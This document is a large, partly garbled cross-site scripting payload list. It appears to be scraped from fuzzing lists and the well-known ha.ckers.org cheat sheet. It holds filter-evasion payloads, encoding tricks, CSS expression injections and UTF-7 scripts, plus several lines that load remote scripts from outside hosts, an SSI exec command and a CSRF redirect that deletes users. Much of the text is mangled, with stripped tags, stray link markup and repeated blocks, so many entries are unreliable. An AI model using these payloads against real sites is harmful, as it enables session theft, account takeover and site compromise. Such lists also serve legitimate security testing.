javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert ...

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

'`">javascript:alert(1)

'`">javascript:alert(1)

\x3Cscript>javascript:alert(1)

'"`>/* *\x2Fjavascript:alert(1)// */

javascript:alert(1)</script\x0D

javascript:alert(1)</script\x0A

javascript:alert(1)</script\x0B

javascript:alert(1)

-->

--> -->

--> -->

--> -->

--> -->

`"'>

test

"'`>a='hello\x27;javascript:alert(1)//';

test

test

test

test

test

test

test

test

test

test

test

test

test

test

/* *\x2A/javascript:alert(1)// */

/* *\x00/javascript:alert(1)// */

"'`>ABCDEF

"'`>ABCDEF

if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}

if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}

if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}

'`">javascript:alert(1)

'`">javascript:alert(1)

"'`>

"'`>

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

"`'>\x3Bjavascript:alert(1)

"`'>\x0Djavascript:alert(1)

"`'>\xEF\xBB\xBFjavascript:alert(1)

"`'>\xE2\x80\x81javascript:alert(1)

"`'>\xE2\x80\x84javascript:alert(1)

"`'>\xE3\x80\x80javascript:alert(1)

"`'>\x09javascript:alert(1)

"`'>\xE2\x80\x89javascript:alert(1)

"`'>\xE2\x80\x85javascript:alert(1)

"`'>\xE2\x80\x88javascript:alert(1)

"`'>\x00javascript:alert(1)

"`'>\xE2\x80\xA8javascript:alert(1)

"`'>\xE2\x80\x8Ajavascript:alert(1)

"`'>\xE1\x9A\x80javascript:alert(1)

"`'>\x0Cjavascript:alert(1)

"`'>\x2Bjavascript:alert(1)

"`'>\xF0\x90\x96\x9Ajavascript:alert(1)

"`'>-javascript:alert(1)

"`'>\x0Ajavascript:alert(1)

"`'>\xE2\x80\xAFjavascript:alert(1)

"`'>\x7Ejavascript:alert(1)

"`'>\xE2\x80\x87javascript:alert(1)

"`'>\xE2\x81\x9Fjavascript:alert(1)

"`'>\xE2\x80\xA9javascript:alert(1)

"`'>\xC2\x85javascript:alert(1)

"`'>\xEF\xBF\xAEjavascript:alert(1)

"`'>\xE2\x80\x83javascript:alert(1)

"`'>\xE2\x80\x8Bjavascript:alert(1)

"`'>\xEF\xBF\xBEjavascript:alert(1)

"`'>\xE2\x80\x80javascript:alert(1)

"`'>\x21javascript:alert(1)

"`'>\xE2\x80\x82javascript:alert(1)

"`'>\xE2\x80\x86javascript:alert(1)

"`'>\xE1\xA0\x8Ejavascript:alert(1)

"`'>\x0Bjavascript:alert(1)

"`'>\x20javascript:alert(1)

"`'>\xC2\xA0javascript:alert(1)

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

javascript:alert(1)

<video poster=javascript:javascript:alert(1)//

...............

Clickme clickme

XXX

javascript:alert(1)

alert(1)0

document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;

javascript:alert(1)">

javascript:alert(1)">

javascript:alert(1)">

javascript:alert(1)'>">

javascript:alert(1)">

javascript:alert(1)">

d.innerHTML=d.innerHTML

XXX

javascript:alert(1)"` `>

">

javascript:alert(1)

-->

p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};

<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d

@import "data:,*%7bx:expression(javascript:alert(1))%7D";

XXXXXX

*[{}@import'%(css)s?]X

XXX

XXX

*{x:expression(javascript:alert(1))}

X with(document.getElementById("d"))innerHTML=innerHTML

XXX #x{font-family:foo[bar;color:green;} #y];color:red;{}

XXX

({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval

({0:#0=eval/#0#/#0#(javascript:alert(1))})

ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x

Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()

&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi

&alert&A7&(1)&R&UA;&&

¼script¾javascript:alert(1)¼/script¾

XXX

%(payload)s

javascript:alert(1)

%(payload)s//

<IMG SRC="javascript:javascript:alert(1)"

<iframe src=%(scriptlet)s <

@import'%(css)s';

; REL=stylesheet">

li {list-style-image: url("javascript:javascript:alert(1)");}XSS

javascript:alert(1);

.XSS{background-image:url("javascript:javascript:alert(1)");}

BODY{background:url("javascript:javascript:alert(1)")}

javascript:alert(1);

XSS""","XML namespace."),("""&lt;IMG SRC="javascript:javascript:alert(1)"&gt;

+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-

@import'%(css)s';

a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}

&&javascript:alert(1)&&;&&

javascript:alert(1);

]]

test1

test1

%(payload)s">

">

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

>">'>alert(String.fromCharCode(88,83,83))

'';!--"=&{()}

xxs link

xxs link

alert("XSS")">

perl -e 'print "";' > out

alert("XSS");//

<IMG SRC="javascript:alert('XSS')"

<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <

\";alert('XSS');//

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

@import'ha.ckers.org/xss.css';

; REL=stylesheet">

BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}

@im\port'\ja\vasc\ript:alert("XSS")';

exp/*

alert('XSS');

.XSS{background-image:url("javascript:alert('XSS')");}

BODY{background:url("javascript:alert('XSS')")}

BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

'"-->

alert("XSS")'); ?>

Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser

alert('XSS')">

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

" SRC="ha.ckers.org/xss.js">

" SRC="ha.ckers.org/xss.js">

" '' SRC="ha.ckers.org/xss.js">

'" SRC="ha.ckers.org/xss.js">

` SRC="ha.ckers.org/xss.js">

'>" SRC="ha.ckers.org/xss.js">

document.write("PT SRC="ha.ckers.org/xss.js">

XSS

XSS

XSS

XSS

XSS

XSS

{font-family&colon;''

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

alert&lpar;1&rpar; {Opera}

<img/src=`%00` onerror=<a href="http://this.onerror=confirm" target="_blank" rel="nofollow">this.onerror=confirm</a>(1)

<isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

prompt(1)</ScRipT giveanswerhere=?

/*%00*/alert(1)/*%00*/</script /*%00*/

&#34;&#62;%00

">

</script

<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}

X</a

http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script

XYZ</a

<img/src=@&#32;&#13; onerror = prompt('&#49;')

<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

alert(<a href="http://String.fromCharCode" target="_blank" rel="nofollow">String.fromCharCode</a>(49))</script ^__^

/**/alert(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)/**/</script &amp;#32; :-(

&#00;

/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

alert(0%0)

SPAN

<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=&Tab;prompt(1)

&#34;&#62;{-o-link-source&colon;''

&#13;OnMouseOver {Firefox & Opera}

^__^

X {IE7}

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

////

/*iframe/src*/

//|\\ //|\\ </script //|\\

/{src&#x3A;''/

<plaintext/onmouseover=prompt(1)

''alert&#x28;1&#x29; {Opera}

DIV

On Mouse Over

Click Here

alert(1);

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<iframe/src=javascript:confirm(1)

http://<a href="http://www.alert" target="_blank" rel="nofollow">www.alert</a>(1)</script .com

alert(1)

click

MsgBox+1

">X</a

~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

</script a=\u0061 & /=%2F

</script

+-+-1-+-+alert(1)

/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

//&NewLine;confirm(1);

alert(1)

ClickMe

alert(1) </script 1=2

style="x:">

--!>

">

CLICKME

click

Click Me

‘; alert(1);

‘)alert(1);//

alert(1)

{font-family&colon;''

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

alert&lpar;1&rpar; {Opera}

<img/src=`%00` onerror=<a href="http://this.onerror=confirm" target="_blank" rel="nofollow">this.onerror=confirm</a>(1)

<isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

prompt(1)</ScRipT giveanswerhere=?

/*%00*/alert(1)/*%00*/</script /*%00*/

&#34;&#62;%00

">

</script

<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}

X</a

http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script

XYZ</a

<img/src=@&#32;&#13; onerror = prompt('&#49;')

<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

alert(<a href="http://String.fromCharCode" target="_blank" rel="nofollow">String.fromCharCode</a>(49))</script ^__^

/**/alert(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)/**/</script &amp;#32; :-(

&#00;

/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

alert(0%0)

SPAN

<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=&Tab;prompt(1)

&#34;&#62;{-o-link-source&colon;''

&#13;OnMouseOver {Firefox & Opera}

^__^

X {IE7}

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

////

/*iframe/src*/

//|\\ //|\\ </script //|\\

/{src&#x3A;''/

<plaintext/onmouseover=prompt(1)

''alert&#x28;1&#x29; {Opera}

DIV

On Mouse Over

Click Here

alert(1);

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<iframe/src=javascript:confirm(1)

http://<a href="http://www.alert" target="_blank" rel="nofollow">www.alert</a>(1)</script .com

alert(1)

click

MsgBox+1

">X</a

~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

</script a=\u0061 & /=%2F

</script

+-+-1-+-+alert(1)

/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

//&NewLine;confirm(1);

alert(1)

ClickMe

alert(1) </script 1=2

style="x:">

--!>

">

CLICKME

click

Click Me

String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))

alert(“XSS”)”>

alert(“XSS”);//

%253cscript%253ealert(1)%253c/script%253e

“>alert(document.cookie)

fooalert(1)

ipt>alert(1)ipt>

<IMG SRC=”javascript:alert(‘XSS’)”

<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <

javascript:alert("hellox worldss")

">'>alert(String.fromCharCode(88,83,83))

" SRC="ha.ckers.org/xss.js">

" '' SRC="ha.ckers.org/xss.js">

'" SRC="ha.ckers.org/xss.js">

'>" SRC="ha.ckers.org/xss.js">

document.write("PT SRC="ha.ckers.org/xss.js">

alert("XSS");//

">'>alert(String.fromCharCode(88,83,83))

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search

alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510

alert("XSS");&search=1

0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search

hellox worldss

...

lol

alert(1)">

alert(1)">

alert(1)">

alert(1)'>">

alert(1)">

alert(123)">

LOL

LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}

({0:#0=alert/#0#/#0#(0)})

LOLalert(123)

&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;

\\";alert('XSS');//

&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;

&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;

&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;

&lt;BODY ONLOAD=alert('XSS')&gt;

&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;

&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;

&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;

&lt;BR SIZE=\"&{alert('XSS')}\"&gt;

&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;

&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;

&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;

&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;

&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;

&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;

&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;

&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS

&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;

&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;

&lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;

žscriptualert(EXSSE)ž/scriptu

&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;

&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;

&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"

&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;

&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;

&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;

&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;

&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;

&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;

&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;

&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;

&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;

&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;

&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;

exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");

xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;

&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;

&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;

&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;

&lt;!--&#91;if gte IE 4&#93;&gt;

&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;

&lt;!&#91;endif&#93;--&gt;

&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;

&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;

&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;

&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;

&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;

a=\"get\";

b=\"URL(\\"\";

c=\"javascript&#058;\";

d=\"alert('XSS');\\")\";

eval(a+b+c+d);

&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;

&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;

&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;

&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;

&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;

&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;

&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;

&lt;HTML&gt;&lt;BODY&gt;

&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;

&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;

&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;

&lt;/BODY&gt;&lt;/HTML&gt;

&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;

&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;

&lt;? echo('&lt;SCR)';

echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;

&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;

Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser

&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;

&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;

&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;

&lt;

%3C

&lt

&lt;

&LT

&LT;

&#60

&#060

&#0060

&#00060

&#000060

&#0000060

&lt;

&#x3c

&#x03c

&#x003c

&#x0003c

&#x00003c

&#x000003c

&#x3c;

&#x03c;

&#x003c;

&#x0003c;

&#x00003c;

&#x000003c;

&#X3c

&#X03c

&#X003c

&#X0003c

&#X00003c

&#X000003c

&#X3c;

&#X03c;

&#X003c;

&#X0003c;

&#X00003c;

&#X000003c;

&#x3C

&#x03C

&#x003C

&#x0003C

&#x00003C

&#x000003C

&#x3C;

&#x03C;

&#x003C;

&#x0003C;

&#x00003C;

&#x000003C;

&#X3C

&#X03C

&#X003C

&#X0003C

&#X00003C

&#X000003C

&#X3C;

&#X03C;

&#X003C;

&#X0003C;

&#X00003C;

&#X000003C;

\x3c

\x3C

\u003c

\u003C

&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;

&lt;IMG SRC=\"javascript&#058;alert('XSS')\"

&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;

&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;

&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;

&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;

&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;

&lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt;

perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out

perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out

&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;

&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;

&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;

&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;

&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;

&lt;IMG SRC=javascript&#058;alert('XSS')&gt;

&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;

&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;

&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;

&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;

&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;

&lt;IMG SRC=javascript&#058;alert('XSS')&gt;

&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;

&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;

'';!--\"&lt;XSS&gt;=&{()}

';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

'';!--"=&{()}

